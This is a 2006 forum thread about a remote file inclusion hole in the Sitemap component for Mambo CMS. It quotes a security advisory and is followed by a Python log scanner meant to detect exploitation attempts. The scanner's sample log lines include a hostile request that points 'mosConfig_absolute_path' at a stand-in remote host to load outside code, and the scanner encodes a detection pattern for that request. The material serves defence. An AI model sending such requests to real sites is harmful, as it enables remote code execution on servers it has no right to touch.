Post by gustavo » Wed Jul 12, 2006 3:10 pm
Have a nice day
Author : Matdhule
Contact : [email protected]
Application : Sitemap 2.0.0 for Mambo 4.5.1 CMS
Version : Sitemap 2.0.0
Download : http://mamboxchange.com/frs/download.ph ... emap20.zip
Post by Peter Koch » Wed Jul 12, 2006 3:55 pm
Post by gustavo » Fri Jul 14, 2006 12:56 pm
http://www.frsirt.com/english/advisories/2006/2803
Advisory ID : FrSIRT/ADV-2006-2803
CVE ID : GENERIC-MAP-NOMATCH
Rated as : High Risk
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-07-14
Technical Description
A vulnerability has been identified in SiteMap (component for Mambo), which may be exploited by attackers to execute arbitrary commands. This flaw is due to an input validation error in the "sitemap.xml.php" script that fails to validate the "mosConfig_absolute_path" parameter, which could be exploited by remote attackers to include malicious files and execute arbitrary commands with the privileges of the web server.
Affected Products
SiteMap (component for Mambo) version 2.0 and prior
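A defender's check for the request pattern the advisory describes, as an added example that is not part of the original posts or the advisory: it flags access-log entries where `sitemap.xml.php` receives a `mosConfig_absolute_path` query parameter. The Combined Log Format input, the `/PLACEHOLDER/` path and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

SCRIPT = "sitemap.xml.php"           # script named in the advisory
PARAM = "mosconfig_absolute_path"    # parameter named in the advisory (lower-cased)

# Assumed input: Apache/nginx Combined Log Format.
LINE_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')
# A value starting with scheme:// or // points the include at a remote or wrapped source.
REMOTE_RE = re.compile(r'^(?:[a-z][a-z0-9+.-]*:)?//', re.I)

def classify(line):
    """Return (client, status, reason) for a suspicious request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/" + SCRIPT):
        return None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() != PARAM:
            continue
        value = unquote(value)  # parse_qsl decoded once; decode again for double encoding
        reason = "remote-include" if REMOTE_RE.match(value) else "path-override"
        return client, int(status), reason
    return None

def scan(lines):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines; /PLACEHOLDER/ stands in for the component's real path.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Jul/2006:10:01:02 +0000] "GET /PLACEHOLDER/sitemap.xml.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [14/Jul/2006:10:05:44 +0000] "GET /PLACEHOLDER/sitemap.xml.php'
    '?mosConfig_absolute_path=http://host.invalid/x.txt%3F HTTP/1.0" 200 312',
    '198.51.100.7 - - [14/Jul/2006:10:05:51 +0000] "GET /PLACEHOLDER/sitemap.xml.php'
    '?mosConfig_absolute_path=%2Ftmp%2F HTTP/1.0" 500 0',
    '203.0.113.5 - - [14/Jul/2006:10:07:13 +0000] "GET /index.php?option=com_sitemap HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for client, status, reason in scan(SAMPLE_LOG):
        print(f"{client} status={status} {reason}")
```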
Post by Jinx » Fri Jul 21, 2006 11:58 am